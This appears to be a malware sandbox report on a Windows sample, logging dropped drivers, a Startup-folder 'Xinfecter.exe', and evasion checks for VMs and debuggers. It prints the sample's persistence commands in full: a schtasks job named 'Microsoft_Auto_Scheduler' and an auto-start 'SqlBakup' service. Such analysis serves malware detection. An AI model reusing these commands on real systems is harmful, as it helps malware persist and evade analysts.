      Source: xKvkNk9SXR.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
      Source: xKvkNk9SXR.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
      Source: xKvkNk9SXR.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_00A500BB LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00A500BB
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_00A41557 push ecx; ret 0_2_00A4156A
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_00A41BB6 push ecx; ret 0_2_00A41BC9
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_00614748 push CD380F00h; iretd 42_2_0061474D
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_00631557 push ecx; ret 42_2_0063156A
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_00631BB6 push ecx; ret 42_2_00631BC9

      Persistence and Installation Behavior

      barindex
      Sample is not signed and drops a device driver
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeFile created: C:\Windows\SysMain.sysJump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeFile created: C:\Users\user\AppData\N-Save.sysJump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeJump to dropped file

      Boot Survival

      barindex
      Drops PE files to the startup folder
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeJump to dropped file
      Uses schtasks.exe or at.exe to add and modify task schedules
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\user\AppData\S-2153.bat'" /f
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeJump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeJump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe\:Zone.Identifier:$DATAJump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe\:Zone.Identifier:$DATAJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto

      Hooking and other Techniques for Hiding and Protection

      barindex
      Uses known network protocols on non-standard ports
      Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 3586
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_00A29908 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00A29908
      Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\systeminfo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\systeminfo.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion

      barindex
      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
      Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
      Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
      Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeAPI coverage: 8.4 %
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeAPI coverage: 2.5 %
      Source: C:\Windows\SysWOW64\timeout.exe TID: 1396Thread sleep count: 123 > 30
      Source: C:\Windows\SysWOW64\timeout.exe TID: 4828Thread sleep count: 131 > 30
      Source: C:\Windows\SysWOW64\timeout.exe TID: 1196Thread sleep count: 128 > 30
      Source: C:\Windows\SysWOW64\timeout.exe TID: 6512Thread sleep count: 124 > 30
      Source: C:\Windows\SysWOW64\timeout.exe TID: 1120Thread sleep count: 134 > 30
      Source: C:\Windows\SysWOW64\timeout.exe TID: 4852Thread sleep count: 134 > 30
      Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
      Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
      Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
      Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
      Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
      Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
      Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
      Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
      Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
      Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeFile Volume queried: \Device\CdRom0\ FullSizeInformationJump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_009C8240 SetErrorMode,FindFirstFileW,0_2_009C8240
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_009C8380 SetErrorMode,FindFirstFileW,SetErrorMode,FindFirstFileW,0_2_009C8380
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_009BFCC9 FindNextFileW,FindClose,SetErrorMode,FindFirstFileW,0_2_009BFCC9
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_009CAF50 SetErrorMode,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,std::ios_base::_Ios_base_dtor,FindNextFileW,FindClose,0_2_009CAF50
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_009C9ABA lstrcmpW,lstrcmpW,lstrcmpW,std::ios_base::_Ios_base_dtor,FindNextFileW,FindClose,SetErrorMode,FindFirstFileW,0_2_009C9ABA
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_00A7BA6B FindFirstFileExA,0_2_00A7BA6B
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_005B8240 SetErrorMode,FindFirstFileW,42_2_005B8240
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_005B8380 SetErrorMode,FindFirstFileW,SetErrorMode,FindFirstFileW,42_2_005B8380
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_005BAF50 SetErrorMode,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,std::ios_base::_Ios_base_dtor,FindNextFileW,FindClose,42_2_005BAF50
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_0066BA6B FindFirstFileExA,42_2_0066BA6B
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_005B9ABA lstrcmpW,lstrcmpW,lstrcmpW,std::ios_base::_Ios_base_dtor,FindNextFileW,FindClose,SetErrorMode,FindFirstFileW,42_2_005B9ABA
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_009CD950 GetLogicalDriveStringsA,0_2_009CD950
      Source: wscript.exe, 0000000E.00000003.2092655057.0000000002908000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\y
      Source: xKvkNk9SXR.exe, 00000000.00000002.3297094059.0000000000F9B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
      Source: xKvkNk9SXR.exe, 00000000.00000002.3297094059.0000000000FD7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: xKvkNk9SXR.exe, 00000000.00000002.3297094059.0000000000FD7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW'
      Source: C:\Windows\SysWOW64\tasklist.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_00A64F58 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00A64F58
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_00A500BB LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00A500BB
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_00A60E79 mov eax, dword ptr fs:[00000030h]0_2_00A60E79
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_00650E79 mov eax, dword ptr fs:[00000030h]42_2_00650E79
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_00A402E0 TlsGetValue,TlsSetValue,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00A402E0
      Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: Debug
      Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: Debug
      Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: Debug
      Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: Debug
      Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: Debug
      Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: Debug
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_00A64F58 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00A64F58
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_00A4176D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00A4176D
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_00A41968 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00A41968
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_00A41ACA SetUnhandledExceptionFilter,0_2_00A41ACA
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_00654F58 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,42_2_00654F58
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_0063176D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,42_2_0063176D
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_00631968 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,42_2_00631968
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /v /fo csv | findstr /i "dcdcf"Jump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=autoJump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start= autoJump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Documents and Settings\user\Start Menu\Programs\Startup\Xinfecter.exe" start= autoJump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c verJump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd "%SystemDrive%\Users\%username%\AppData\"&S-2153.batJump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\%username%\AppData\S-2153.bat'" /fJump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo %date%-%time%Jump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c systeminfo|find /i "os name"Jump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c systeminfo|find /i "original"Jump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c verJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /v /fo csvJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /i "dcdcf"Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=autoJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start= autoJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc create SqlBakup binPath= "C:\Documents and Settings\user\Start Menu\Programs\Startup\Xinfecter.exe" start= autoJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs" Jump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /C echo C:\Users\user\AppData\S-6748.batJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\S-6748.bat" "Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\user\AppData\S-2153.bat'" /fJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\systeminfo.exe systeminfoJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /i "os name"Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /vJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /I /c "dcdcf" Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreakJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /fi "ImageName eq xKvkNk9SXR.exe" /fo csv Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /I "xKvkNk9SXR.exe"Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreakJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /fi "ImageName eq xKvkNk9SXR.exe" /fo csv Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /I "xKvkNk9SXR.exe"Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreakJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /fi "ImageName eq xKvkNk9SXR.exe" /fo csv Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /I "xKvkNk9SXR.exe"Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreakJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /fi "ImageName eq xKvkNk9SXR.exe" /fo csv Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /I "xKvkNk9SXR.exe"Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreakJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /fi "ImageName eq xKvkNk9SXR.exe" /fo csv Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /I "xKvkNk9SXR.exe"Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreakJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /fi "ImageName eq xKvkNk9SXR.exe" /fo csv Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /I "xKvkNk9SXR.exe"Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs" Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\systeminfo.exe systeminfoJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /i "original"Jump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /C echo C:\Users\user\AppData\S-6748.bat
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\S-6748.bat" "
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /v
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I /c "dcdcf"
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_009D3DD0 GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,DuplicateToken,AllocateAndInitializeSid,LocalAlloc,InitializeSecurityDescriptor,GetLengthSid,LocalAlloc,InitializeAcl,AddAccessAllowedAce,SetSecurityDescriptorDacl,SetSecurityDescriptorGroup,SetSecurityDescriptorOwner,IsValidSecurityDescriptor,AccessCheck,LocalFree,LocalFree,LocalFree,FreeSid,CloseHandle,CloseHandle,CloseHandle,0_2_009D3DD0
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_009D3DD0 GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,DuplicateToken,AllocateAndInitializeSid,LocalAlloc,InitializeSecurityDescriptor,GetLengthSid,LocalAlloc,InitializeAcl,AddAccessAllowedAce,SetSecurityDescriptorDacl,SetSecurityDescriptorGroup,SetSecurityDescriptorOwner,IsValidSecurityDescriptor,AccessCheck,LocalFree,LocalFree,LocalFree,FreeSid,CloseHandle,CloseHandle,CloseHandle,0_2_009D3DD0
      Source: Xinfecter.exe, 0000002A.00000002.2189177147.0000000000D0F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerr5.0
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_00A41105 cpuid 0_2_00A41105
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: ___crtGetLocaleInfoEx,0_2_00A3C03B
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: GetLocaleInfoW,0_2_00A3C347
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_00A7E50A
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: EnumSystemLocalesW,0_2_00A7E782
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: EnumSystemLocalesW,0_2_00A7E7CD
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_00A7E8F5
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: EnumSystemLocalesW,0_2_00A7E868
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: GetLocaleInfoW,0_2_00A7EB45
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: EnumSystemLocalesW,0_2_00A72C30
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00A7EC6E
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: GetLocaleInfoW,0_2_00A7ED75
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00A7EE42
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: GetLocaleInfoW,0_2_00A7311A
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: ___crtGetLocaleInfoEx,42_2_0062C03B
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: GetLocaleInfoW,42_2_0062C347
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,42_2_0066E50A
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: EnumSystemLocalesW,42_2_0066E7CD
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: EnumSystemLocalesW,42_2_0066E782
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: EnumSystemLocalesW,42_2_0066E868
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,42_2_0066E8F5
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: GetLocaleInfoW,42_2_0066EB45
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,42_2_0066EC6E
